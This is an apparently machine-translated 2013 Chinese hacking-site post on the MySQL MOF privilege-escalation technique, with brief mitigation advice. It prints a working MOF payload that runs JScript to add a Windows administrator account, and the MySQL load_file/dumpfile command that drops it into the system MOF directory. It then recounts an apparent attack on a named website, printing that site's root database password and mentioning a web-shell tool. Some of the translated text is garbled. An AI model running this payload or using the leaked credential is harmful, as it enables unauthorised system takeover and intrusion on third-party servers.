Mysql mof extension vulnerability example and prevention-vulnerability and early warning-the black bar safety net

2013-01-03T00:00:00
ID MYHACK58:62201336548
Type myhack58
Reporter 佚名
Modified 2013-01-03T00:00:00

Description

Mysql mof extension vulnerability prevention methods

Online disclosure some of the use of the code:

pragma namespace(“\\\\.\\ root\\subscription”)

instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent" "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance. Second = 5"; QueryLanguage = "WQL"; }; instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript. Shell\”)\nWSH. run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

Connect to a mysql database after executing: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’; From the above code see draw solution:

1, the mysql user access control, the prohibition of “load_file”, the”dumpfile”, etc. function

2, prohibit the use of”WScript. Shel”Assembly

3, the directory permissions c:/windows/system32/wbem/mof/ delete the built-in special group CREATOR OWNER

Of course, the above are online that feel the need of permission very large such as root and mysql is outside the chain yesterday met to demonstrate

The thing is, the occurrence of an oil in forum questions I see the following has been found to have a large bovine to engage in the following that is used is mysql mof extended mention of the right to

But the Diamondback is found not to listen too is the rush to check the information to learn...with the above? online content

Understand after you start practicing hand.

http://www.webbmw.com/config/config_ucenter.php a word a

$config['db']['1']['dbhost'] = 'localhost'; $_config['db']['1']['dbuser'] = 'root'; $_config['db']['1']['dbpw'] = 'tfr226206'; $_config['db']['1']['dbcharset'] = 'gbk'; $_config['db']['1']['pconnect'] = '0'; $_config['db'] ['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre’; $_config['db']['common']['slave_except_table'] = ”; to have the root password.

Thus the direct use of chopper opening to engage

!

[1] [2] next